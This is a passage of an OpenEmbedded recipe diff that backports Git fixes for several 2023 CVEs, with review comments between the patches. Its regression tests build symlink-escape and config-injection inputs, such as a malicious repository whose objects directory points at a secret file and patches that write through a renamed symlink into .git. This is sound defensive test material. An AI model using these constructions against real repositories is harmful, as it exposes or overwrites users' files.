+ symlink that points to ../../../.git/modules/foo. So it's dangling.
+
+ - get_repo_path() sees that no such path exists (because it's
+ dangling), and thus we do not canonicalize it into an absolute path
+
+ - because we're using --separate-git-dir, we create .git/modules/foo.
+ Now our symlink is no longer dangling!
+
+ - we pass the url to transport_get(), which sees it as an https URL.
+
+ - we call get_repo_path() again, on the url. This second call was
+ introduced by f38aa83 (use local cloning if insteadOf makes a
+ local URL, 2014-07-17). The idea is that we want to pull the url
+ fresh from the remote.c API, because it will apply any aliases.
+
+And of course now it sees that there is a local file, which is a
+mismatch with the transport we already selected.
+
+The issue in the above sequence is calling `transport_get()` before
+deciding whether or not the repository is indeed local, and not passing
+in an absolute path if it is local.
+
+This is reminiscent of a similar bug report in [1], where it was
+suggested to perform the `insteadOf` lookup earlier. Taking that
+approach may not be as straightforward, since the intent is to store the
+original URL in the config, but to actually fetch from the insteadOf
+one, so conflating the two early on is a non-starter.
+
+Note: we pass the path returned by `get_repo_path(remote->url[0])`,
+which should be the same as `repo_name` (aside from any `insteadOf`
+rewrites).
+
+We *could* pass `absolute_pathdup()` of the same argument, which
+86521ac (Bring local clone's origin URL in line with that of a remote
+clone, 2008-09-01) indicates may differ depending on the presence of
+".git/" for a non-bare repo. That matters for forming relative submodule
+paths, but doesn't matter for the second call, since we're just feeding
+it to the transport code, which is fine either way.
+
+[1]: https://lore.kernel.org/git/CAMoD=Bi41mB3QRn3JdZL-FGHs4w3C2jGpnJB-CqSndO7FMtfzA@mail.gmail.com/
+
+Signed-off-by: Jeff King <peff@peff.net>
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/cf8f6ce02a13f4d1979a53241afbee15a293fce9]
+CVE: CVE-2023-22490
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ builtin/clone.c | 8 ++++----
+ t/t5619-clone-local-ambiguous-transport.sh | 15 +++++++++++----
+ 2 files changed, 15 insertions(+), 8 deletions(-)
+
+diff --git a/builtin/clone.c b/builtin/clone.c
+index 53e04b1..b57e703 100644
+--- a/builtin/clone.c
++++ b/builtin/clone.c
+@@ -1112,10 +1112,6 @@ int cmd_clone(int argc, const char **argv, const char *prefix)
+ branch_top.buf);
+ refspec_append(&remote->fetch, default_refspec.buf);
+
+- transport = transport_get(remote, remote->url[0]);
+- transport_set_verbosity(transport, option_verbosity, option_progress);
+- transport->family = family;
+-
+ path = get_repo_path(remote->url[0], &is_bundle);
+ is_local = option_local != 0 && path && !is_bundle;
+ if (is_local) {
+@@ -1135,6 +1131,10 @@ int cmd_clone(int argc, const char **argv, const char *prefix)
+ }
+ if (option_local > 0 && !is_local)
+ warning(_("--local is ignored"));
++
++ transport = transport_get(remote, path ? path : remote->url[0]);
++ transport_set_verbosity(transport, option_verbosity, option_progress);
++ transport->family = family;
+ transport->cloning = 1;
+
+ transport_set_option(transport, TRANS_OPT_KEEP, "yes");
+diff --git a/t/t5619-clone-local-ambiguous-transport.sh b/t/t5619-clone-local-ambiguous-transport.sh
+index 7ebd31a..cce62bf 100644
+--- a/t/t5619-clone-local-ambiguous-transport.sh
++++ b/t/t5619-clone-local-ambiguous-transport.sh
+@@ -53,11 +53,18 @@ test_expect_success 'setup' '
+ git -C "$REPO" update-server-info
+ '
+
+-test_expect_failure 'ambiguous transport does not lead to arbitrary file-inclusion' '
++test_expect_success 'ambiguous transport does not lead to arbitrary file-inclusion' '
+ git clone malicious clone &&
+- git -C clone submodule update --init &&
+-
+- test_path_is_missing clone/.git/modules/sub/objects/secret
++ test_must_fail git -C clone submodule update --init 2>err &&
++
++ test_path_is_missing clone/.git/modules/sub/objects/secret &&
++ # We would actually expect "transport .file. not allowed" here,
++ # but due to quirks of the URL detection in Git, we mis-parse
++ # the absolute path as a bogus URL and die before that step.
++ #
++ # This works for now, and if we ever fix the URL detection, it
++ # is OK to change this to detect the transport error.
++ grep "protocol .* is not supported" err
+ '
+
+ test_done
+--
+2.25.1
+
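Review bot: The relocated `transport_get()` call in cmd_clone() carries no comment saying that its position after `get_repo_path()` is what closes the hole, so a later cleanup could move it back above the path check without anyone noticing. I would add above it: `/* Pick the transport only after get_repo_path(): choosing it earlier let a non-local transport be paired with the local clone path (CVE-2023-22490). */`. cmd_clone() starts and ends outside the embedded hunk. Because this file is a backport, the comment would ideally be proposed upstream as well, so the local patch does not drift.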
diff --git a/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch b/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch
new file mode 100644
index 0000000000..08fb7f840b
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-22490-3.patch
@@ -0,0 +1,154 @@
+From bffc762f87ae8d18c6001bf0044a76004245754c Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Tue, 24 Jan 2023 19:43:51 -0500
+Subject: [PATCH 3/3] dir-iterator: prevent top-level symlinks without FOLLOW_SYMLINKS
+
+When using the dir_iterator API, we first stat(2) the base path, and
+then use that as a starting point to enumerate the directory's contents.
+
+If the directory contains symbolic links, we will immediately die() upon
+encountering them without the `FOLLOW_SYMLINKS` flag. The same is not
+true when resolving the top-level directory, though.
+
+As explained in a previous commit, this oversight in 6f054f9
+(builtin/clone.c: disallow `--local` clones with symlinks, 2022-07-28)
+can be used as an attack vector to include arbitrary files on a victim's
+filesystem from outside of the repository.
+
+Prevent resolving top-level symlinks unless the FOLLOW_SYMLINKS flag is
+given, which will cause clones of a repository with a symlink'd
+"$GIT_DIR/objects" directory to fail.
+
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/bffc762f87ae8d18c6001bf0044a76004245754c]
+CVE: CVE-2023-22490
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dir-iterator.c | 13 +++++++++----
+ dir-iterator.h | 5 +++++
+ t/t0066-dir-iterator.sh | 27 ++++++++++++++++++++++++++-
+ t/t5604-clone-reference.sh | 16 ++++++++++++++++
+ 4 files changed, 56 insertions(+), 5 deletions(-)
+
+diff --git a/dir-iterator.c b/dir-iterator.c
+index b17e9f9..3764dd8 100644
+--- a/dir-iterator.c
++++ b/dir-iterator.c
+@@ -203,7 +203,7 @@ struct dir_iterator *dir_iterator_begin(const char *path, unsigned int flags)
+ {
+ struct dir_iterator_int *iter = xcalloc(1, sizeof(*iter));
+ struct dir_iterator *dir_iterator = &iter->base;
+- int saved_errno;
++ int saved_errno, err;
+
+ strbuf_init(&iter->base.path, PATH_MAX);
+ strbuf_addstr(&iter->base.path, path);
+@@ -213,10 +213,15 @@ struct dir_iterator *dir_iterator_begin(const char *path, unsigned int flags)
+ iter->flags = flags;
+
+ /*
+- * Note: stat already checks for NULL or empty strings and
+- * inexistent paths.
++ * Note: stat/lstat already checks for NULL or empty strings and
++ * nonexistent paths.
+ */
+- if (stat(iter->base.path.buf, &iter->base.st) < 0) {
++ if (iter->flags & DIR_ITERATOR_FOLLOW_SYMLINKS)
++ err = stat(iter->base.path.buf, &iter->base.st);
++ else
++ err = lstat(iter->base.path.buf, &iter->base.st);
++
++ if (err < 0) {
+ saved_errno = errno;
+ goto error_out;
+ }
+diff --git a/dir-iterator.h b/dir-iterator.h
+index 0822915..e3b6ff2 100644
+--- a/dir-iterator.h
++++ b/dir-iterator.h
+@@ -61,6 +61,11 @@
+ * not the symlinks themselves, which is the default behavior. Broken
+ * symlinks are ignored.
+ *
++ * Note: setting DIR_ITERATOR_FOLLOW_SYMLINKS affects resolving the
++ * starting path as well (e.g., attempting to iterate starting at a
++ * symbolic link pointing to a directory without FOLLOW_SYMLINKS will
++ * result in an error).
++ *
+ * Warning: circular symlinks are also followed when
+ * DIR_ITERATOR_FOLLOW_SYMLINKS is set. The iteration may end up with
+ * an ELOOP if they happen and DIR_ITERATOR_PEDANTIC is set.
+diff --git a/t/t0066-dir-iterator.sh b/t/t0066-dir-iterator.sh
+index 92910e4..c826f60 100755
+--- a/t/t0066-dir-iterator.sh
++++ b/t/t0066-dir-iterator.sh
+@@ -109,7 +109,9 @@ test_expect_success SYMLINKS 'setup dirs with symlinks' '
+ mkdir -p dir5/a/c &&
+ ln -s ../c dir5/a/b/d &&
+ ln -s ../ dir5/a/b/e &&
+- ln -s ../../ dir5/a/b/f
++ ln -s ../../ dir5/a/b/f &&
++
++ ln -s dir4 dir6
+ '
+
+ test_expect_success SYMLINKS 'dir-iterator should not follow symlinks by default' '
+@@ -145,4 +147,27 @@ test_expect_success SYMLINKS 'dir-iterator should follow symlinks w/ follow flag
+ test_cmp expected-follow-sorted-output actual-follow-sorted-output
+ '
+
++test_expect_success SYMLINKS 'dir-iterator does not resolve top-level symlinks' '
++ test_must_fail test-tool dir-iterator ./dir6 >out &&
++
++ grep "ENOTDIR" out
++'
++
++test_expect_success SYMLINKS 'dir-iterator resolves top-level symlinks w/ follow flag' '
++ cat >expected-follow-sorted-output <<-EOF &&
++ [d] (a) [a] ./dir6/a
++ [d] (a/f) [f] ./dir6/a/f
++ [d] (a/f/c) [c] ./dir6/a/f/c
++ [d] (b) [b] ./dir6/b
++ [d] (b/c) [c] ./dir6/b/c
++ [f] (a/d) [d] ./dir6/a/d
++ [f] (a/e) [e] ./dir6/a/e
++ EOF
++
++ test-tool dir-iterator --follow-symlinks ./dir6 >out &&
++ sort out >actual-follow-sorted-output &&
++
++ test_cmp expected-follow-sorted-output actual-follow-sorted-output
++'
++
+ test_done
+diff --git a/t/t5604-clone-reference.sh b/t/t5604-clone-reference.sh
+index 4894237..615b981 100755
+--- a/t/t5604-clone-reference.sh
++++ b/t/t5604-clone-reference.sh
+@@ -354,4 +354,20 @@ test_expect_success SYMLINKS 'clone repo with symlinked or unknown files at obje
+ test_must_be_empty T--shared.objects-symlinks.raw
+ '
+
++test_expect_success SYMLINKS 'clone repo with symlinked objects directory' '
++ test_when_finished "rm -fr sensitive malicious" &&
++
++ mkdir -p sensitive &&
++ echo "secret" >sensitive/file &&
++
++ git init malicious &&
++ rm -fr malicious/.git/objects &&
++ ln -s "$(pwd)/sensitive" ./malicious/.git/objects &&
++
++ test_must_fail git clone --local malicious clone 2>err &&
++
++ test_path_is_missing clone &&
++ grep "failed to start iterator over" err
++'
++
+ test_done
+--
+2.25.1
+
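Review bot: The `lstat()` added to dir_iterator_begin() checks the starting path by name, and the code that later opens that directory lies outside this hunk; if it reopens the same path string, the check and the open are two separate lookups and the result of the first is not bound to the second. Presumably that is acceptable for a source tree nobody modifies during the clone, but the assumption is not written down. I would either state it in the comment, e.g. `/* lstat() rejects a symlinked starting path; assumes the tree is not modified while we iterate. */`, or have the opener verify the descriptor it obtained with `fstat()`. dir_iterator_begin() continues past the end of the embedded hunk.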
diff --git a/meta/recipes-devtools/git/files/CVE-2023-23946.patch b/meta/recipes-devtools/git/files/CVE-2023-23946.patch
new file mode 100644
index 0000000000..3629ff57b2
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-23946.patch
@@ -0,0 +1,184 @@
+From fade728df1221598f42d391cf377e9e84a32053f Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 2 Feb 2023 11:54:34 +0100
+Subject: [PATCH] apply: fix writing behind newly created symbolic links
+
+When writing files git-apply(1) initially makes sure that none of the
+files it is about to create are behind a symlink:
+
+```
+ $ git init repo
+ Initialized empty Git repository in /tmp/repo/.git/
+ $ cd repo/
+ $ ln -s dir symlink
+ $ git apply - <<EOF
+ diff --git a/symlink/file b/symlink/file
+ new file mode 100644
+ index 0000000..e69de29
+ EOF
+ error: affected file 'symlink/file' is beyond a symbolic link
+```
+
+This safety mechanism is crucial to ensure that we don't write outside
+of the repository's working directory. It can be fooled though when the
+patch that is being applied creates the symbolic link in the first
+place, which can lead to writing files in arbitrary locations.
+
+Fix this by checking whether the path we're about to create is
+beyond a symlink or not. Tightening these checks like this should be
+fine as we already have these precautions in Git as explained
+above. Ideally, we should update the check we do up-front before
+starting to reflect the computed changes to the working tree so that
+we catch this case as well, but as part of embargoed security work,
+adding an equivalent check just before we try to write out a file
+should serve us well as a reasonable first step.
+
+Digging back into history shows that this vulnerability has existed
+since at least Git v2.9.0. As Git v2.8.0 and older don't build on my
+system anymore I cannot tell whether older versions are affected, as
+well.
+
+Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport
+[https://github.com/git/git/commit/fade728df1221598f42d391cf377e9e84a32053f]
+CVE: CVE-2023-23946
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ apply.c | 27 ++++++++++++++
+ t/t4115-apply-symlink.sh | 81 ++++++++++++++++++++++++++++++++++++++++
+ 2 files changed, 108 insertions(+)
+
+diff --git a/apply.c b/apply.c
+index f8a046a..4f303bf 100644
+--- a/apply.c
++++ b/apply.c
+@@ -4373,6 +4373,33 @@ static int create_one_file(struct apply_state *state,
+ if (state->cached)
+ return 0;
+
++ /*
++ * We already try to detect whether files are beyond a symlink in our
++ * up-front checks. But in the case where symlinks are created by any
++ * of the intermediate hunks it can happen that our up-front checks
++ * didn't yet see the symlink, but at the point of arriving here there
++ * in fact is one. We thus repeat the check for symlinks here.
++ *
++ * Note that this does not make the up-front check obsolete as the
++ * failure mode is different:
++ *
++ * - The up-front checks cause us to abort before we have written
++ * anything into the working directory. So when we exit this way the
++ * working directory remains clean.
++ *
++ * - The checks here happen in the middle of the action where we have
++ * already started to apply the patch. The end result will be a dirty
++ * working directory.
++ *
++ * Ideally, we should update the up-front checks to catch what would
++ * happen when we apply the patch before we damage the working tree.
++ * We have all the information necessary to do so. But for now, as a
++ * part of embargoed security work, having this check would serve as a
++ * reasonable first step.
++ */
++ if (path_is_beyond_symlink(state, path))
++ return error(_("affected file '%s' is beyond a symbolic link"), path);
++
+ res = try_create_file(state, path, mode, buf, size);
+ if (res < 0)
+ return -1;
+diff --git a/t/t4115-apply-symlink.sh b/t/t4115-apply-symlink.sh
+index 872fcda..1acb7b2 100755
+--- a/t/t4115-apply-symlink.sh
++++ b/t/t4115-apply-symlink.sh
+@@ -44,4 +44,85 @@ test_expect_success 'apply --index symlink patch' '
+
+ '
+
++test_expect_success 'symlink setup' '
++ ln -s .git symlink &&
++ git add symlink &&
++ git commit -m "add symlink"
++'
++
++test_expect_success SYMLINKS 'symlink escape when creating new files' '
++ test_when_finished "git reset --hard && git clean -dfx" &&
++
++ cat >patch <<-EOF &&
++ diff --git a/symlink b/renamed-symlink
++ similarity index 100%
++ rename from symlink
++ rename to renamed-symlink
++ --
++ diff --git /dev/null b/renamed-symlink/create-me
++ new file mode 100644
++ index 0000000..039727e
++ --- /dev/null
++ +++ b/renamed-symlink/create-me
++ @@ -0,0 +1,1 @@
++ +busted
++ EOF
++
++ test_must_fail git apply patch 2>stderr &&
++ cat >expected_stderr <<-EOF &&
++ error: affected file ${SQ}renamed-symlink/create-me${SQ} is beyond a symbolic link
++ EOF
++ test_cmp expected_stderr stderr &&
++ ! test_path_exists .git/create-me
++'
++
++test_expect_success SYMLINKS 'symlink escape when modifying file' '
++ test_when_finished "git reset --hard && git clean -dfx" &&
++ touch .git/modify-me &&
++
++ cat >patch <<-EOF &&
++ diff --git a/symlink b/renamed-symlink
++ similarity index 100%
++ rename from symlink
++ rename to renamed-symlink
++ --
++ diff --git a/renamed-symlink/modify-me b/renamed-symlink/modify-me
++ index 1111111..2222222 100644
++ --- a/renamed-symlink/modify-me
++ +++ b/renamed-symlink/modify-me
++ @@ -0,0 +1,1 @@
++ +busted
++ EOF
++
++ test_must_fail git apply patch 2>stderr &&
++ cat >expected_stderr <<-EOF &&
++ error: renamed-symlink/modify-me: No such file or directory
++ EOF
++ test_cmp expected_stderr stderr &&
++ test_must_be_empty .git/modify-me
++'
++
++test_expect_success SYMLINKS 'symlink escape when deleting file' '
++ test_when_finished "git reset --hard && git clean -dfx && rm .git/delete-me" &&
++ touch .git/delete-me &&
++
++ cat >patch <<-EOF &&
++ diff --git a/symlink b/renamed-symlink
++ similarity index 100%
++ rename from symlink
++ rename to renamed-symlink
++ --
++ diff --git a/renamed-symlink/delete-me b/renamed-symlink/delete-me
++ deleted file mode 100644
++ index 1111111..0000000 100644
++ EOF
++
++ test_must_fail git apply patch 2>stderr &&
++ cat >expected_stderr <<-EOF &&
++ error: renamed-symlink/delete-me: No such file or directory
++ EOF
++ test_cmp expected_stderr stderr &&
++ test_path_is_file .git/delete-me
++'
++
+ test_done
+--
+2.25.1
+
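Review bot: The new `symlink setup` test in t4115 runs `ln -s .git symlink` without the SYMLINKS prerequisite that the three tests after it declare, so on a filesystem without symlink support the setup step itself fails instead of being skipped. Declaring it as `test_expect_success SYMLINKS 'symlink setup' '` keeps the group consistent. In the first escape test, `! test_path_exists .git/create-me` would also read better as `test_path_is_missing .git/create-me`, which is the helper the other patches in this series use for the same assertion.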
diff --git a/meta/recipes-devtools/git/files/CVE-2023-25652.patch b/meta/recipes-devtools/git/files/CVE-2023-25652.patch
new file mode 100644
index 0000000000..d6b17a2b8a
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-25652.patch
@@ -0,0 +1,94 @@
+From 9db05711c98efc14f414d4c87135a34c13586e0b Mon Sep 17 00:00:00 2001
+From: Johannes Schindelin <johannes.schindelin@gmx.de>
+Date: Thu, 9 Mar 2023 16:02:54 +0100
+Subject: [PATCH] apply --reject: overwrite existing `.rej` symlink if it
+ exists
+
+The `git apply --reject` is expected to write out `.rej` files in case
+one or more hunks fail to apply cleanly. Historically, the command
+overwrites any existing `.rej` files. The idea being that
+apply/reject/edit cycles are relatively common, and the generated `.rej`
+files are not considered precious.
+
+But the command does not overwrite existing `.rej` symbolic links, and
+instead follows them. This is unsafe because the same patch could
+potentially create such a symbolic link and point at arbitrary paths
+outside the current worktree, and `git apply` would write the contents
+of the `.rej` file into that location.
+
+Therefore, let's make sure that any existing `.rej` file or symbolic
+link is removed before writing it.
+
+Reported-by: RyotaK <ryotak.mail@gmail.com>
+Helped-by: Taylor Blau <me@ttaylorr.com>
+Helped-by: Junio C Hamano <gitster@pobox.com>
+Helped-by: Linus Torvalds <torvalds@linuxfoundation.org>
+Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/9db05711c98efc14f414d4c87135a34c13586e0b]
+CVE: CVE-2023-25652
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ apply.c | 14 ++++++++++++--
+ t/t4115-apply-symlink.sh | 15 +++++++++++++++
+ 2 files changed, 27 insertions(+), 2 deletions(-)
+
+diff --git a/apply.c b/apply.c
+index 4f303bf..aa7111d 100644
+--- a/apply.c
++++ b/apply.c
+@@ -4531,7 +4531,7 @@ static int write_out_one_reject(struct apply_state *state, struct patch *patch)
+ FILE *rej;
+ char namebuf[PATH_MAX];
+ struct fragment *frag;
+- int cnt = 0;
++ int fd, cnt = 0;
+ struct strbuf sb = STRBUF_INIT;
+
+ for (cnt = 0, frag = patch->fragments; frag; frag = frag->next) {
+@@ -4571,7 +4571,17 @@ static int write_out_one_reject(struct apply_state *state, struct patch *patch)
+ memcpy(namebuf, patch->new_name, cnt);
+ memcpy(namebuf + cnt, ".rej", 5);
+
+- rej = fopen(namebuf, "w");
++ fd = open(namebuf, O_CREAT | O_EXCL | O_WRONLY, 0666);
++ if (fd < 0) {
++ if (errno != EEXIST)
++ return error_errno(_("cannot open %s"), namebuf);
++ if (unlink(namebuf))
++ return error_errno(_("cannot unlink '%s'"), namebuf);
++ fd = open(namebuf, O_CREAT | O_EXCL | O_WRONLY, 0666);
++ if (fd < 0)
++ return error_errno(_("cannot open %s"), namebuf);
++ }
++ rej = fdopen(fd, "w");
+ if (!rej)
+ return error_errno(_("cannot open %s"), namebuf);
+
+diff --git a/t/t4115-apply-symlink.sh b/t/t4115-apply-symlink.sh
+index 1acb7b2..2b034ff 100755
+--- a/t/t4115-apply-symlink.sh
++++ b/t/t4115-apply-symlink.sh
+@@ -125,4 +125,19 @@ test_expect_success SYMLINKS 'symlink escape when deleting file' '
+ test_path_is_file .git/delete-me
+ '
+
++test_expect_success SYMLINKS '--reject removes .rej symlink if it exists' '
++ test_when_finished "git reset --hard && git clean -dfx" &&
++
++ test_commit file &&
++ echo modified >file.t &&
++ git diff -- file.t >patch &&
++ echo modified-again >file.t &&
++
++ ln -s foo file.t.rej &&
++ test_must_fail git apply patch --reject 2>err &&
++ test_i18ngrep "Rejected hunk" err &&
++ test_path_is_missing foo &&
++ test_path_is_file file.t.rej
++'
++
+ test_done
+--
+2.25.1
+
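Review bot: In write_out_one_reject(), when `fdopen(fd, "w")` fails the function returns through `error_errno()` while `fd` is still open, so the descriptor obtained from the new `open()` call leaks on that path. Closing it before the return fixes this; since `close()` may overwrite `errno`, save it first: `int saved_errno = errno; close(fd); errno = saved_errno;`. The function starts and ends outside the embedded hunk. As this file is a backport, the change would also need to go upstream.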
diff --git a/meta/recipes-devtools/git/files/CVE-2023-29007.patch b/meta/recipes-devtools/git/files/CVE-2023-29007.patch
new file mode 100644
index 0000000000..e166c01412
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2023-29007.patch
@@ -0,0 +1,159 @@
+From 057c07a7b1fae22fdeef26c243f4cfbe3afc90ce Mon Sep 17 00:00:00 2001
+From: Taylor Blau <me@ttaylorr.com>
+Date: Fri, 14 Apr 2023 11:46:59 -0400
+Subject: [PATCH] Merge branch 'tb/config-copy-or-rename-in-file-injection'
+
+Avoids issues with renaming or deleting sections with long lines, where
+configuration values may be interpreted as sections, leading to
+configuration injection. Addresses CVE-2023-29007.
+
+* tb/config-copy-or-rename-in-file-injection:
+ config.c: disallow overly-long lines in `copy_or_rename_section_in_file()`
+ config.c: avoid integer truncation in `copy_or_rename_section_in_file()`
+ config: avoid fixed-sized buffer when renaming/deleting a section
+ t1300: demonstrate failure when renaming sections with long lines
+
+Signed-off-by: Taylor Blau <me@ttaylorr.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/528290f8c61222433a8cf02fb7cfffa8438432b4]
+CVE: CVE-2023-29007
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ config.c | 36 +++++++++++++++++++++++++-----------
+ t/t1300-config.sh | 30 ++++++++++++++++++++++++++++++
+ 2 files changed, 55 insertions(+), 11 deletions(-)
+
+diff --git a/config.c b/config.c
+index e7052b3..676b687 100644
+--- a/config.c
++++ b/config.c
+@@ -2987,9 +2987,10 @@ void git_config_set_multivar(const char *key, const char *value,
+ multi_replace);
+ }
+
+-static int section_name_match (const char *buf, const char *name)
++static size_t section_name_match (const char *buf, const char *name)
+ {
+- int i = 0, j = 0, dot = 0;
++ size_t i = 0, j = 0;
++ int dot = 0;
+ if (buf[i] != '[')
+ return 0;
+ for (i = 1; buf[i] && buf[i] != ']'; i++) {
+@@ -3042,6 +3043,8 @@ static int section_name_is_ok(const char *name)
+ return 1;
+ }
+
++#define GIT_CONFIG_MAX_LINE_LEN (512 * 1024)
++
+ /* if new_name == NULL, the section is removed instead */
+ static int git_config_copy_or_rename_section_in_file(const char *config_filename,
+ const char *old_name,
+@@ -3051,11 +3054,12 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ char *filename_buf = NULL;
+ struct lock_file lock = LOCK_INIT;
+ int out_fd;
+- char buf[1024];
++ struct strbuf buf = STRBUF_INIT;
+ FILE *config_file = NULL;
+ struct stat st;
+ struct strbuf copystr = STRBUF_INIT;
+ struct config_store_data store;
++ uint32_t line_nr = 0;
+
+ memset(&store, 0, sizeof(store));
+
+@@ -3092,16 +3096,25 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ goto out;
+ }
+
+- while (fgets(buf, sizeof(buf), config_file)) {
+- int i;
+- int length;
++ while (!strbuf_getwholeline(&buf, config_file, '\n')) {
++ size_t i, length;
+ int is_section = 0;
+- char *output = buf;
+- for (i = 0; buf[i] && isspace(buf[i]); i++)
++ char *output = buf.buf;
++
++ line_nr++;
++
++ if (buf.len >= GIT_CONFIG_MAX_LINE_LEN) {
++ ret = error(_("refusing to work with overly long line "
++ "in '%s' on line %"PRIuMAX),
++ config_filename, (uintmax_t)line_nr);
++ goto out;
++ }
++
++ for (i = 0; buf.buf[i] && isspace(buf.buf[i]); i++)
+ ; /* do nothing */
+- if (buf[i] == '[') {
++ if (buf.buf[i] == '[') {
+ /* it's a section */
+- int offset;
++ size_t offset;
+ is_section = 1;
+
+ /*
+@@ -3118,7 +3131,7 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ strbuf_reset(&copystr);
+ }
+
+- offset = section_name_match(&buf[i], old_name);
++ offset = section_name_match(&buf.buf[i], old_name);
+ if (offset > 0) {
+ ret++;
+ if (new_name == NULL) {
+@@ -3193,6 +3206,7 @@ static int git_config_copy_or_rename_section_in_file(const char *config_filename
+ out_no_rollback:
+ free(filename_buf);
+ config_store_data_clear(&store);
++ strbuf_release(&buf);
+ return ret;
+ }
+
+diff --git a/t/t1300-config.sh b/t/t1300-config.sh
+index 983a0a1..9b67f6b 100755
+--- a/t/t1300-config.sh
++++ b/t/t1300-config.sh
+@@ -616,6 +616,36 @@ test_expect_success 'renaming to bogus section is rejected' '
+ test_must_fail git config --rename-section branch.zwei "bogus name"
+ '
+
++test_expect_success 'renaming a section with a long line' '
++ {
++ printf "[b]\\n" &&
++ printf " c = d %1024s [a] e = f\\n" " " &&
++ printf "[a] g = h\\n"
++ } >y &&
++ git config -f y --rename-section a xyz &&
++ test_must_fail git config -f y b.e
++'
++
++test_expect_success 'renaming an embedded section with a long line' '
++ {
++ printf "[b]\\n" &&
++ printf " c = d %1024s [a] [foo] e = f\\n" " " &&
++ printf "[a] g = h\\n"
++ } >y &&
++ git config -f y --rename-section a xyz &&
++ test_must_fail git config -f y foo.e
++'
++
++test_expect_success 'renaming a section with an overly-long line' '
++ {
++ printf "[b]\\n" &&
++ printf " c = d %525000s e" " " &&
++ printf "[a] g = h\\n"
++ } >y &&
++ test_must_fail git config -f y --rename-section a xyz 2>err &&
++ test_i18ngrep "refusing to work with overly long line in .y. on line 2" err
++'
++
+ cat >> .git/config << EOF
+ [branch "zwei"] a = 1 [branch "vier"]
+ EOF
+--
+2.25.1
+
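Review bot: The patch header names two different upstream commits: the `From` line gives 057c07a7b1fae22fdeef26c243f4cfbe3afc90ce, while the Upstream-Status URL points at 528290f8c61222433a8cf02fb7cfffa8438432b4. The subject is a merge of four commits, so one of the ids may be the same merge on another branch, but the header does not say which, and that makes the backport harder to audit against upstream. I would make the two agree, or add a line naming the four squashed commits. Separately, the `GIT_CONFIG_MAX_LINE_LEN` check runs after `strbuf_getwholeline()` has already read the line, so it limits what is processed rather than what is allocated.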
diff --git a/meta/recipes-devtools/git/git.inc b/meta/recipes-devtools/git/git.inc
index 4131c98977..e64472ea28 100644
--- a/meta/recipes-devtools/git/git.inc
+++ b/meta/recipes-devtools/git/git.inc
@@ -1,5 +1,6 @@
SUMMARY = "Distributed version control system"
HOMEPAGE = "http://git-scm.com"
+DESCRIPTION = "Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency."
SECTION = "console/utils"
LICENSE = "GPLv2"
DEPENDS = "openssl curl zlib expat"
@@ -7,14 +8,44 @@ DEPENDS = "openssl curl zlib expat"
PROVIDES_append_class-native = " git-replacement-native"
SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \
- ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages"
-
+ ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages \
+ file://fixsort.patch \
+ file://CVE-2021-40330.patch \
+ file://CVE-2022-23521.patch \
+ file://CVE-2022-41903-01.patch \
+ file://CVE-2022-41903-02.patch \
+ file://CVE-2022-41903-03.patch \
+ file://CVE-2022-41903-04.patch \
+ file://CVE-2022-41903-05.patch \
+ file://CVE-2022-41903-06.patch \
+ file://CVE-2022-41903-07.patch \
+ file://CVE-2022-41903-08.patch \
+ file://CVE-2022-41903-09.patch \
+ file://CVE-2022-41903-10.patch \
+ file://CVE-2022-41903-11.patch \
+ file://CVE-2022-41903-12.patch \
+ file://CVE-2023-22490-1.patch \
+ file://CVE-2023-22490-2.patch \
+ file://CVE-2023-22490-3.patch \
+ file://CVE-2023-23946.patch \
+ file://CVE-2023-29007.patch \
+ file://CVE-2023-25652.patch \
+ "
S = "${WORKDIR}/git-${PV}"
LIC_FILES_CHKSUM = "file://COPYING;md5=7c0d7ef03a7eb04ce795b0f60e68e7e1"
CVE_PRODUCT = "git-scm:git"
+# This is about a manpage not mentioning --mirror may "leak" information
+# in mirrored git repos. Most OE users wouldn't build the docs and
+# we don't see this as a major issue for our general users/usecases.
+CVE_CHECK_WHITELIST += "CVE-2022-24975"
+# This is specific to Git-for-Windows
+CVE_CHECK_WHITELIST += "CVE-2022-41953"
+# specific to Git for Windows
+CVE_CHECK_WHITELIST += "CVE-2023-22743"
+
PACKAGECONFIG ??= ""
PACKAGECONFIG[cvsserver] = ""
PACKAGECONFIG[svn] = ""
